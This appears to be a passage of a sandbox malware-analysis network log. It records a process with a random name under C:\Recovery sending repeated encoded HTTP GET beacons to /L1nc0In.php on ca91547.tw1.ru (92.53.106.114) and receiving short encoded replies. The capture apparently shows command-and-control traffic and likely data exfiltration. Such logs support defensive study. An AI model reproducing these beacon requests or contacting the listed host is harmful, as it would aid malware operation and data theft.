Dec 15, 2024 00:23:32.619623899 CET	2152	OUT	GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEV [TRUNCATED] Accept: / Content-Type: text/plain User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: ca91547.tw1.ru
Dec 15, 2024 00:23:33.955064058 CET	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Sat, 14 Dec 2024 23:23:33 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 4e 79 4d 6a 59 68 68 6a 5a 79 4d 6a 4d 32 51 6a 5a 78 41 44 4e 34 4d 6d 59 6d 46 6d 5a 6d 4e 7a 4e 79 59 57 4d 31 59 57 4f 69 4a 79 65 36 49 69 59 32 4d 7a 59 69 42 44 4f 6c 4a 54 4e 6c 56 44 4f 32 45 54 59 6b 4e 44 4f 79 51 32 59 32 4d 44 4f 32 4d 57 5a 68 4a 44 4f 6a 4a 79 65 Data Ascii: ==Qf9JiI6IiNyMjYhhjZyMjM2QjZxADN4MmYmFmZmNzNyYWM1YWOiJye6IiY2MzYiBDOlJTNlVDO2ETYkNDOyQ2Y2MDO2MWZhJDOjJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49842	92.53.106.114	80	2872	C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:23:39.088579893 CET	2152	OUT	GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEV [TRUNCATED] Accept: / Content-Type: text/plain User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: ca91547.tw1.ru
Dec 15, 2024 00:23:40.428457022 CET	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Sat, 14 Dec 2024 23:23:40 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 4e 79 4d 6a 59 68 68 6a 5a 79 4d 6a 4d 32 51 6a 5a 78 41 44 4e 34 4d 6d 59 6d 46 6d 5a 6d 4e 7a 4e 79 59 57 4d 31 59 57 4f 69 4a 79 65 36 49 69 59 32 4d 7a 59 69 42 44 4f 6c 4a 54 4e 6c 56 44 4f 32 45 54 59 6b 4e 44 4f 79 51 32 59 32 4d 44 4f 32 4d 57 5a 68 4a 44 4f 6a 4a 79 65 Data Ascii: ==Qf9JiI6IiNyMjYhhjZyMjM2QjZxADN4MmYmFmZmNzNyYWM1YWOiJye6IiY2MzYiBDOlJTNlVDO2ETYkNDOyQ2Y2MDO2MWZhJDOjJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49858	92.53.106.114	80	2872	C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:23:45.558192015 CET	2152	OUT	GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEV [TRUNCATED] Accept: / Content-Type: text/plain User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: ca91547.tw1.ru
Dec 15, 2024 00:23:47.018378973 CET	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Sat, 14 Dec 2024 23:23:46 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 4e 79 4d 6a 59 68 68 6a 5a 79 4d 6a 4d 32 51 6a 5a 78 41 44 4e 34 4d 6d 59 6d 46 6d 5a 6d 4e 7a 4e 79 59 57 4d 31 59 57 4f 69 4a 79 65 36 49 69 59 32 4d 7a 59 69 42 44 4f 6c 4a 54 4e 6c 56 44 4f 32 45 54 59 6b 4e 44 4f 79 51 32 59 32 4d 44 4f 32 4d 57 5a 68 4a 44 4f 6a 4a 79 65 Data Ascii: ==Qf9JiI6IiNyMjYhhjZyMjM2QjZxADN4MmYmFmZmNzNyYWM1YWOiJye6IiY2MzYiBDOlJTNlVDO2ETYkNDOyQ2Y2MDO2MWZhJDOjJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49874	92.53.106.114	80	2872	C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:23:52.151367903 CET	2176	OUT	GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEV [TRUNCATED] Accept: / Content-Type: text/plain User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: ca91547.tw1.ru Connection: Keep-Alive
Dec 15, 2024 00:23:53.486313105 CET	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Sat, 14 Dec 2024 23:23:53 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 4e 79 4d 6a 59 68 68 6a 5a 79 4d 6a 4d 32 51 6a 5a 78 41 44 4e 34 4d 6d 59 6d 46 6d 5a 6d 4e 7a 4e 79 59 57 4d 31 59 57 4f 69 4a 79 65 36 49 69 59 32 4d 7a 59 69 42 44 4f 6c 4a 54 4e 6c 56 44 4f 32 45 54 59 6b 4e 44 4f 79 51 32 59 32 4d 44 4f 32 4d 57 5a 68 4a 44 4f 6a 4a 79 65 Data Ascii: ==Qf9JiI6IiNyMjYhhjZyMjM2QjZxADN4MmYmFmZmNzNyYWM1YWOiJye6IiY2MzYiBDOlJTNlVDO2ETYkNDOyQ2Y2MDO2MWZhJDOjJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49890	92.53.106.114	80	2872	C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:23:58.738325119 CET	2152	OUT	GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEV [TRUNCATED] Accept: / Content-Type: text/plain User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: ca91547.tw1.ru
Dec 15, 2024 00:24:00.080388069 CET	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Sat, 14 Dec 2024 23:23:59 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 4e 79 4d 6a 59 68 68 6a 5a 79 4d 6a 4d 32 51 6a 5a 78 41 44 4e 34 4d 6d 59 6d 46 6d 5a 6d 4e 7a 4e 79 59 57 4d 31 59 57 4f 69 4a 79 65 36 49 69 59 32 4d 7a 59 69 42 44 4f 6c 4a 54 4e 6c 56 44 4f 32 45 54 59 6b 4e 44 4f 79 51 32 59 32 4d 44 4f 32 4d 57 5a 68 4a 44 4f 6a 4a 79 65 Data Ascii: ==Qf9JiI6IiNyMjYhhjZyMjM2QjZxADN4MmYmFmZmNzNyYWM1YWOiJye6IiY2MzYiBDOlJTNlVDO2ETYkNDOyQ2Y2MDO2MWZhJDOjJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49906	92.53.106.114	80	2872	C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:24:05.239721060 CET	2152	OUT	GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEV [TRUNCATED] Accept: / Content-Type: text/plain User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: ca91547.tw1.ru
Dec 15, 2024 00:24:06.561363935 CET	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Sat, 14 Dec 2024 23:24:06 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 4e 79 4d 6a 59 68 68 6a 5a 79 4d 6a 4d 32 51 6a 5a 78 41 44 4e 34 4d 6d 59 6d 46 6d 5a 6d 4e 7a 4e 79 59 57 4d 31 59 57 4f 69 4a 79 65 36 49 69 59 32 4d 7a 59 69 42 44 4f 6c 4a 54 4e 6c 56 44 4f 32 45 54 59 6b 4e 44 4f 79 51 32 59 32 4d 44 4f 32 4d 57 5a 68 4a 44 4f 6a 4a 79 65 Data Ascii: ==Qf9JiI6IiNyMjYhhjZyMjM2QjZxADN4MmYmFmZmNzNyYWM1YWOiJye6IiY2MzYiBDOlJTNlVDO2ETYkNDOyQ2Y2MDO2MWZhJDOjJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49922	92.53.106.114	80	2872	C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:24:11.698849916 CET	2150	OUT	GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=QX9JiI6ISZwYWO0UmM5YTZzI2MjJTO1IGNklDZxUjZ2czYkJjMwICLiEGOiJmN5UGZ2IzYiBjMhRmYlZjZmJWMmRGOjZTO4QzNkRmMxEDOxImI6IiZzgDMyMmM2UGMllzN4QjNiJTYxQWYxM2MlRDO5IGOwICLiMGOkJjZjZWZmFTZzIDZhJWZzITZiFDNxkjZ5E2Y3gDZ0AjMlRzN4EjI6IiMhZGNyI2Y0gDOzQGZ0IWZ0ITO3IWYjJ2YhJzMiRGOxIyes0nI5YlaPlWUYRmdWdlYwJlRjxmVHJGVKNETpNWbiBnQYpFb4JTVp9maJpnVIRGaSNTV1IFWhJDbHRmaGtWSzlUaJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEVa3lWSwRjMkZXNyEWdWZ0SnRjMk [TRUNCATED] Accept: / Content-Type: text/plain User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: ca91547.tw1.ru Connection: Keep-Alive
Dec 15, 2024 00:24:13.036046982 CET	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Sat, 14 Dec 2024 23:24:12 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 4e 79 4d 6a 59 68 68 6a 5a 79 4d 6a 4d 32 51 6a 5a 78 41 44 4e 34 4d 6d 59 6d 46 6d 5a 6d 4e 7a 4e 79 59 57 4d 31 59 57 4f 69 4a 79 65 36 49 69 59 32 4d 7a 59 69 42 44 4f 6c 4a 54 4e 6c 56 44 4f 32 45 54 59 6b 4e 44 4f 79 51 32 59 32 4d 44 4f 32 4d 57 5a 68 4a 44 4f 6a 4a 79 65 Data Ascii: ==Qf9JiI6IiNyMjYhhjZyMjM2QjZxADN4MmYmFmZmNzNyYWM1YWOiJye6IiY2MzYiBDOlJTNlVDO2ETYkNDOyQ2Y2MDO2MWZhJDOjJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49938	92.53.106.114	80	2872	C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:24:18.167455912 CET	2176	OUT	GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEV [TRUNCATED] Accept: / Content-Type: text/plain User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: ca91547.tw1.ru Connection: Keep-Alive
Dec 15, 2024 00:24:19.518748045 CET	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Sat, 14 Dec 2024 23:24:19 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 4e 79 4d 6a 59 68 68 6a 5a 79 4d 6a 4d 32 51 6a 5a 78 41 44 4e 34 4d 6d 59 6d 46 6d 5a 6d 4e 7a 4e 79 59 57 4d 31 59 57 4f 69 4a 79 65 36 49 69 59 32 4d 7a 59 69 42 44 4f 6c 4a 54 4e 6c 56 44 4f 32 45 54 59 6b 4e 44 4f 79 51 32 59 32 4d 44 4f 32 4d 57 5a 68 4a 44 4f 6a 4a 79 65 Data Ascii: ==Qf9JiI6IiNyMjYhhjZyMjM2QjZxADN4MmYmFmZmNzNyYWM1YWOiJye6IiY2MzYiBDOlJTNlVDO2ETYkNDOyQ2Y2MDO2MWZhJDOjJye

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49954	92.53.106.114	80	2872	C:\Recovery\UplbXNLOfTNXjbhPJQLmKdgT.exe

Timestamp	Bytes transferred	Direction	Data
Dec 15, 2024 00:24:24.653124094 CET	2176	OUT	GET /L1nc0In.php?C514=doeh8J79bHCLPWM&a3168bb3a0a66a80c97b1c5f65d27314=wMiNGMxIzMmdTZiljY0YDMwMGMklDZ2E2NkZzMkRTY3UjN1kjMiJWN3MTO5czM0ITOyQTM2cDO&438f148c0e5f9286e56e53eb6890b7d4=AN2EDZjNmZzUWYkN2N1IjY4EWMjVmM2MmNkBzM3UTY0gjYzMjNkJmN&67f9507ea65bfaeab135f64196ff63f5=d1nIhhjYiZTOlRmNyMmYwITYkJWZ2YmZiFjZkhzY2kDO0cDZkJTMxgTMiJiOiY2M4AjMjJjNlBTZ5cDO0YjYyEWMkFWMjNTZ0gTOihDMiwiIjhDZyY2YmVmZxU2MyQWYiV2MyUmYxQTM5YWOhN2N4QGNwITZ0cDOxIiOiITYmRjMiNGN4gzMkRGNiVGNykzNiF2YiNWYyMjYkhTMis3W&71411a4c54be7086c59f1fd61c0b5f77=d1nIiojIlBjZ5QTZykjNlNjYzMmM5UjY0QWOkFTNmZzNjRmMyAjIsISY4ImY2kTZkZjMjJGMyEGZiVmNmZmYxYGZ4MmN5gDN3QGZyETM4EjYiojImNDOwIzYyYTZwUWO3gDN2ImMhFDZhFzYzUGN4kjY4AjIsIyY4QmMmNmZlZWMlNjMkFmYlNjMlJWM0ETOmlTYjdDOkRDMyUGN3gTMiojIyEmZ0IjYjRDO4MDZkRjYlRjM5cjYhNmYjFmMzIGZ4EjI7xSfikjVq9UaRhFZ2Z1ViBnUGNGbWdkYUp0QMl2YtJGcChlWshnMVl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEc0IDZ2VjMhVnVGt0Z0IDZ2VjMhVnVslkNJNlW0ZUbUZlQxEV [TRUNCATED] Accept: / Content-Type: text/plain User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 